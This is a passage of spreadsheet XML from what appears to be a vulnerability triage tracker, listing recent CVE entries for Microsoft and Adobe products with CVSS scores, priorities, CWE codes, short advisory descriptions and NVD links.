      <c r="Q289" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69583</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69589</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29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0" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr"/>
      <c r="Q290" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69589</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69593</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29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1" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr"/>
      <c r="Q291" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69593</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69594</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr"/>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr"/>
      <c r="Q292" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69594</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69787</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29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3" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr"/>
      <c r="Q293" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69787</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70334</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr"/>
      <c r="K294" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr"/>
      <c r="Q294" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>Incomplete list of disallowed inputs in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally.</t>
        </is>
      </c>
      <c r="S294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70334</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70572</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29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5" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr"/>
      <c r="Q295" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70572</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70581</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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6" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr"/>
      <c r="Q296" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-20</t>
        </is>
      </c>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70581</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72941</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29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7" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr"/>
      <c r="Q297" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72941</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72946</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr"/>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr"/>
      <c r="Q298" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Storage Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72946</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72988</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29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9" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr"/>
      <c r="Q299" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72988</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72992</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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0" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr"/>
      <c r="Q300" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72992</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72993</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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1" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr"/>
      <c r="Q301" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72993</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72994</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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2" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr"/>
      <c r="Q302" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72994</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72997</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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3" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr"/>
      <c r="Q303" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72997</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73000</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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4" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr"/>
      <c r="Q304" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73000</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73015</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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5" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr"/>
      <c r="Q305" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73015</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73020</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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6" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr"/>
      <c r="Q306" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73020</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75771</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr"/>
      <c r="K307" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr"/>
      <c r="Q307" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R307"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07" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75771</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75862</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
